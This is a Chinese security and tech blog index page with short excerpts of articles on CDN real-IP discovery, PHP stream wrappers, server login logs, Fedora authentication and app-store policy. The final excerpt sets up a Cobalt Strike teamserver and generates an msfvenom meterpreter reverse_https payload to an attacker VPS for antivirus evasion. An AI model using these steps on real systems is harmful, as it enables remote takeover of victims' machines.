黑客尋找網站真實IP手段大揭秘!

2018年,網路安全事件頻發,我司ISEC實驗室通過對各安全事件的研究分析,發現很多攻擊手段都是通過脆弱的旁站和C段實現的,DDoS亦是如此,它可以導致伺服器被佔用資源甚至當機。這些攻擊得以實施都是由於用戶web伺服器的真實ip暴露出去了。本期「安仔課堂」,ISEC實驗室陳老師將為大家揭秘黑客查找真實ip的多種方法。一、什麼是CDN首先,我們來認識下最尋常的真實ip隱藏的方法「CDN」。 內容分發網路(content delivery network或content distribution ...
Read more

棋牌遊戲出海,如何不懼「沉輪」

業內人都知道2018年的國內棋牌市場因整頓市場的需要,是舉步維艱的,簡直是在刀刃上行走,許多大大小小不符標準的棋牌公司大部分退場和離去,已屢見不鮮。隨著全球的移動遊戲產業的全面增長,國內的棋牌市場的發展完善,棋牌遊戲內容由於具有文化沉澱更是吸引國外的眼球,留下來的公司大都在尋求生存之道,熬過這個棋牌「寒冬」的同時,也是將目光投向全球,棋牌遊戲出海自然而然成為國內棋牌發展的一個主流。 App Annie 是移動應用和數字內容時代數據分析和市場數據的行業領導者,備受行業信賴,於2018 年7 月30 日 發布2018 年上半年中國移動遊戲出海報告,一一闡述中國移動遊戲發行商的全球表現。中國移動遊戲發行商的海外iOS 及Google Play 綜合收入在2018 年上半年較2017 年同一時間段增長超過了40%。而海外玩家在中國移動遊戲上的總支出也已經超過了160 億美元。 其中2018 ...
Read more

PHP偽協議相關

PHP官方文檔:http://php.net/manual/zh/wrappers.phpfile:// — 訪問本地文件系統 http:// — 訪問 HTTP(s) 網址 ftp:// — 訪問 FTP(s) URLs php:// — 訪問各個輸入/輸出流(I/O streams) zlib:// — 壓縮流 data:// — 數據(RFC 2397) glob:// — 查找匹配的文件路徑模式 phar:// — PHP 歸檔 ssh2:// — Secure Shell 2 rar:// — RAR ogg:// — 音頻流 expect:// — 處理互動式的流 我們從最常用的開始分析。 要注意,先把php.ini的allow_url_fopen 和allow_url_include設置為On,不然會影響偽協議的使用。 php:// php:// — ...
Read more

40款智能門鎖15%被輕易打開,這些鎖究竟安全嗎?

Tags: 網路安全
近幾年,智能門鎖逐漸進入了越來越多的家庭。截至2018年6月底,我國智能門鎖生產企業已經超過1500家,接近甚至超過了傳統機械制鎖規模以上企業的數量,2018年,智能門鎖的銷量預計可能已經達到了2100萬套。 那麼,人氣漸漲的智能門鎖是否更加安全呢?對此,市場監管總局就在全國範圍內,組織了一次智能門鎖的風險監測。  門鎖產品升級 ...
Read more

做好這兩點,避免伺服器成為肉雞(傀儡)

/var/log/wtmp 用於記錄登錄成功的用戶的信息,是一個二進位文件,只能通過 last 命令來查看 root pts/0 100.87.41.98 Sat Feb 16 01:28 still logged in root pts/2 100.87.41.98 Fri Feb 15 11:38 - down (01:35) root pts/1 100.87.41.98 Fri Feb 15 11:38 - down (01:35) root pts/0 100.87.41.98 Fri Feb 15 11:38 - down (01:35) 查看嘗試惡意登陸的前十個IP: sudo lastb | awk { print $3} | awk ...
Read more

你知道么,世界上的安全軟體分為兩類…..

在浩如煙海的電腦應用程序中,許多人都有一個必裝的「.exe」——安全軟體。不裝的電腦像暴露在病毒中「裸奔」,而裝上之後,電腦就像有了「門神」的保護。在過去,安全軟體只要確保用戶的一台電腦就足夠了,但如今,萬物互聯的大安全時代,安全軟體如何滿足人們的安全防護需求呢?隨著全球最大的智能安全防禦系統——360安全大腦面世,至此世界上的安全軟體可分為兩類:一類是沒有連接安全大腦的傳統安全軟體;而另一類,是已經連接360安全大腦的新安全軟體360安全衛士12.0。 360安全大腦的安全能力如何?360安全大腦是一個分散式智能安全系統。顧名思義,它借鑒人腦的功用,將大數據、人工智慧、雲計算、IoT智能感知、區塊鏈等新技術融於一身,廣泛採集一切與安全有關的數據,並通過人工智慧的方法進行分析和計算,從而感知網路安全運行狀況和安全態勢,預測可能發生的攻擊,其背後的數據、技術、安全能力已經積累十多年,並日趨完善。目前, ...
Read more

小議安全分析

到寫年終總結的時候,總有一種忙了一年,卻想不起來忙了啥的感覺。算算,從事安全分析已經一年多;漏洞挖掘,漏洞分析到後面的事件追蹤都接觸過,對安全分析也有了一些淺顯的了解。寫一下對安全分析的想法,也算對工作的總結吧。這篇博客有以下兩部分: 安全分析是什麼 安全分析生命周期 內容完全是站在個人安全研究的角度,對企業安全建設幫助不大,不喜勿噴。 0x01 何為安全分析 安全分析說白了就是對安全事件的響應;通過一些方法收集信息,經過對信息的處理,產出情報的過程。所以安全分析是以情報為導向,不管是漏洞預警,惡意軟體分析、還是攻擊事件追蹤,都是要產出有助於安全建設決策的情報。因此安全分析有三個核心階段: 信息收集 信息分析,產出情報 將情報進行傳播 安全分析最後的結果是要到導出情報,情報是有時效的。安全分析做的如何,取決於收集到信息的廣度和及時性,以及對信息處理的能力。 0x02 ...
Read more

谷歌打擊應用商店惡意評級和評論:誘導評級也被禁止

2018年12月19日據美國科技媒體ZDNet報道,谷歌近日宣布將對購買評級和評論欺騙用戶或破壞競爭對手聲譽的應用開發人員進行嚴厲打擊。那些使用應用內策略來鼓勵用戶對應用進行評級和評論(比如獎勵用戶遊戲內貨幣、額外升級乃至真實貨幣等)的開發商也在此打擊範圍內。除了應用開發商之外,打擊對象還包括在評論中發表褻瀆、仇恨或與主題無關言論的用戶。 在今日發布的一篇博客文章里,谷歌向所有可能仍在使用或打算在未來使用此類服務的應用開發人員發出公開提醒,稱公司將推出一個新的「結合了人類智慧與機器學習的系統,以檢測和對違反政策的評級與評論採取行動」,並建議應用開發人員遵循公司規則否則將面臨屏蔽制裁。谷歌目前也在敦促Play Store用戶積極報告疑似違反上述規則的用戶。谷歌稱,公司希望清理Google Play ...
Read more

通過詢問-響應身份認證提高桌面登錄安全

今天,Fedora 提供了多種方式來提高我們賬戶的身份認證的安全性。當然,它有我們熟悉的用戶名密碼登錄方式,它也同樣提供了其他的身份認證選項,比如生物識別、指紋、智能卡、一次性密碼,甚至是 詢問-響應(challenge-response)身份認證。每種認證方式都有明確的優缺點。這點本身就可以成為一篇相當冗長的文章的主題。Fedora 雜誌之前就已經介紹過了這其中的一些選項: 在 Fedora 中使用 YubiKey4 Fedora 28:在 OpenSSH 中更好的支持智能卡 在現在的 Fedora 版本中,最安全的方法之一就是離線硬體詢問-響應。它也同樣是最容易部署的方法之一。下面是具體方法。 詢問-響應認證 從技術上來講,當你輸入密碼的時候,你就正在響應用戶名詢問。離線的詢問、響應包含了這些部分:首先是需要你的用戶名,接下來,Fedora ...
Read more

CS3.12 使用入門

首先在伺服器上部署teamserver:docker run -d -e passwd=cspass -p 50050:50050 -p 3389:3389 xi4okv/cs:3.12 50050 CS客戶端連接埠 再開放幾個埠作為listenercspass是客戶端連接密碼。 然後是啟動客戶端配置Listener 最後是生成後門。為了達到免殺的效果。這裡使用我之前發的文章中內存載入shellcode的方式。msfvenom -p windows/meterpreter/reverse_https -f hex -o rev.hex LHOST=vps_IP LPORT=3389cat rev.hex ...
Read more
1 2 26 Next